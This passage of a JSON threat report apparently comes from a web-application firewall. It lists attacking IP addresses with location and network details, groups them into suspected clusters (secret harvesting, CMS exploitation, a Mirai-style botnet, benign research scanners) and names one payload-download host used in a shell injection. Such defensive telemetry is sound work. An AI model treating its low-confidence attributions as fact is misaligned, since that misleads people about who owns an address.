   "ip": "20.83.164.196",
   "country": "United States",
   "cc": "US",
   "city": "Ashburn",
   "lat": 39.0438,
   "lon": -77.4874,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T18:15:00+02:00",
   "last_seen": "2026-10-03T18:15:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.156.128.101",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 211680,
   "org": "NSEC - Sistemas Informaticos, S.A.",
   "ptr": "sh-ams-nl-gp6-wk105a.internet-census.org",
   "types": [
    "cms-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T19:28:00+02:00",
   "last_seen": "2026-10-03T19:28:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [
    "/owa/"
   ],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS sh-ams-nl-gp6-wk105a.internet-census.org"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.156.128.104",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 211680,
   "org": "NSEC - Sistemas Informaticos, S.A.",
   "ptr": "sh-ams-nl-gp6-wk105d.internet-census.org",
   "types": [
    "php-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T19:31:00+02:00",
   "last_seen": "2026-10-03T19:31:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [
    "/owncloud/status.php"
   ],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS sh-ams-nl-gp6-wk105d.internet-census.org"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "74.249.190.122",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T18:17:00+02:00",
   "last_seen": "2026-10-03T18:17:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  }
 ],
 "iocs": [
  {
   "indicator": "172.168.171.61",
   "port": null,
   "kind": "payload-download-host",
   "context": "Shell command injection payload fetches /",
   "seen_from": "103.74.21.89"
  }
 ],
 "actors": [
  {
   "label": "Suspected credential/secret-harvesting campaign",
   "confidence": "medium",
   "addresses": 33,
   "ips": [
    "34.52.229.253",
    "213.209.159.84",
    "195.178.110.28",
    "45.156.87.186",
    "130.12.180.117",
    "193.32.204.199",
    "45.153.102.164",
    "34.28.187.158",
    "91.92.242.37",
    "102.220.161.139",
    "102.220.161.87",
    "104.194.155.42",
    "193.32.162.155",
    "45.45.237.97",
    "111.90.180.172",
    "134.199.157.29",
    "154.54.100.190",
    "170.64.131.170",
    "170.64.214.139",
    "178.128.151.198",
    "192.241.132.217",
    "193.32.162.156",
    "193.32.162.157",
    "23.234.72.92",
    "34.31.120.130",
    "35.238.129.244",
    "45.148.10.95",
    "84.233.199.151",
    "91.148.244.131",
    "94.154.43.125",
    "94.154.43.129",
    "94.154.43.84",
    "96.126.130.210"
   ],
   "top_countries": {
    "NL": 10,
    "US": 9,
    "AU": 3,
    "AD": 2,
    "SI": 2
   },
   "types": {
    "secret-probe": 30,
    "credential-probe": 4,
    "behaviour": 1
   },
   "evidence": [
    "hunts for .env, VCS or credential files",
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS47890 UNMANAGED LTD (abuse-prone hosting)",
    "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night",
    "AS219502 Storm Industries (abuse-prone hosting)"
   ]
  },
  {
   "label": "Suspected CMS exploitation bot",
   "confidence": "medium",
   "addresses": 15,
   "ips": [
    "139.28.219.70",
    "143.244.57.92",
    "146.70.194.222",
    "45.146.55.115",
    "82.102.18.222",
    "91.193.232.116",
    "103.189.178.93",
    "103.59.161.219",
    "173.239.213.16",
    "20.210.186.186",
    "82.197.69.56",
    "85.204.70.94",
    "91.193.232.178",
    "103.146.203.111",
    "144.48.130.71"
   ],
   "top_countries": {
    "FR": 4,
    "US": 4,
    "ID": 2,
    "GB": 1,
    "IN": 1
   },
   "types": {
    "cms-probe": 13,
    "php-probe": 2
   },
   "evidence": [
    "CMS, admin panel or PHP script probing",
    "2 addresses from 91.193.232.0/24 (AS62240) attacked the same night"
   ]
  },
  {
   "label": "Suspected exploit/RCE bot",
   "confidence": "low",
   "addresses": 8,
   "ips": [
    "43.163.90.125",
    "154.202.66.141",
    "161.132.49.125",
    "185.221.237.197",
    "196.189.236.67",
    "20.65.217.174",
    "40.74.212.136",
    "52.248.42.25"
   ],
   "top_countries": {
    "US": 3,
    "SG": 2,
    "PE": 1,
    "DE": 1,
    "ET": 1
   },
   "types": {
    "rce-payload": 8
   },
   "evidence": [
    "sent a shell or PHP payload"
   ]
  },
  {
   "label": "Automated attack tool",
   "confidence": "low",
   "addresses": 6,
   "ips": [
    "20.65.144.90",
    "20.65.171.30",
    "172.202.106.160",
    "187.108.1.142",
    "20.83.164.196",
    "74.249.190.122"
   ],
   "top_countries": {
    "US": 5,
    "BR": 1
   },
   "types": {
    "attack-tool": 6
   },
   "evidence": [
    "request carried a known attack-tool user agent"
   ]
  },
  {
   "label": "Internet research scanner (benign)",
   "confidence": "high",
   "addresses": 5,
   "ips": [
    "167.71.175.236",
    "206.189.225.181",
    "216.218.206.66",
    "45.156.128.101",
    "45.156.128.104"
   ],
   "top_countries": {
    "US": 3,
    "NL": 2
   },
   "types": {
    "secret-probe": 3,
    "cms-probe": 1,
    "php-probe": 1
   },
   "evidence": [
    "reverse DNS ca7e79b6df.scan.leakix.org",
    "reverse DNS c8021b81a5.scan.leakix.org",
    "reverse DNS scan-05.shadowserver.io",
    "reverse DNS sh-ams-nl-gp6-wk105a.internet-census.org",
    "reverse DNS sh-ams-nl-gp6-wk105d.internet-census.org"
   ]
  },
  {
   "label": "Suspected Mirai-style IoT botnet",
   "confidence": "medium",
   "addresses": 4,
   "ips": [
    "103.46.186.85",
    "103.46.186.148",
    "103.74.21.89",
    "192.3.245.183"
   ],
   "top_countries": {
    "ID": 2,
    "PK": 1,
    "US": 1
   },
   "types": {
    "rce-payload": 3,
    "command-injection": 1
   },
   "evidence": [
    "IoT/router exploit path with a downloader typical of Mirai-family loaders",
    "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
   ]
  },
  {
   "label": "Unattributed automated probe",
   "confidence": "low",
   "addresses": 2,
   "ips": [
    "20.219.185.206",
    "38.248.19.54"
   ],
   "top_countries": {
    "IN": 1,
    "ID": 1
   },
   "types": {},
   "evidence": []
  },
  {
   "label": "Known-bad scanning infrastructure",
   "confidence": "medium",
   "addresses": 2,
   "ips": [
    "45.138.12.44",
    "45.138.12.45"
   ],
   "top_countries": {
    "HK": 2
   },
   "types": {
    "cms-probe": 1
   },
   "evidence": [
    "AS218785 TC DATACENTER (abuse-prone hosting)",
    "2 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
   ]
  },
  {
   "label": "CDN edge relaying an attack (true origin hidden)",
   "confidence": "high",
   "addresses": 1,
   "ips": [
    "172.68.183.22"
   ],
   "top_countries": {
    "SE": 1
   },
   "types": {
    "secret-probe": 1
   },
   "evidence": [
    "AS13335 Cloudflare is a CDN; the real client is behind it"
   ]
  }
 ],
 "banned_identifiers": {
  "ip_addresses": 63,
  "ban_actions": 70,
  "email_addresses": 0,
  "other": 0,
  "note": "The WAF bans network addresses only; no e-mail or account identifiers appear in the source."
 }
}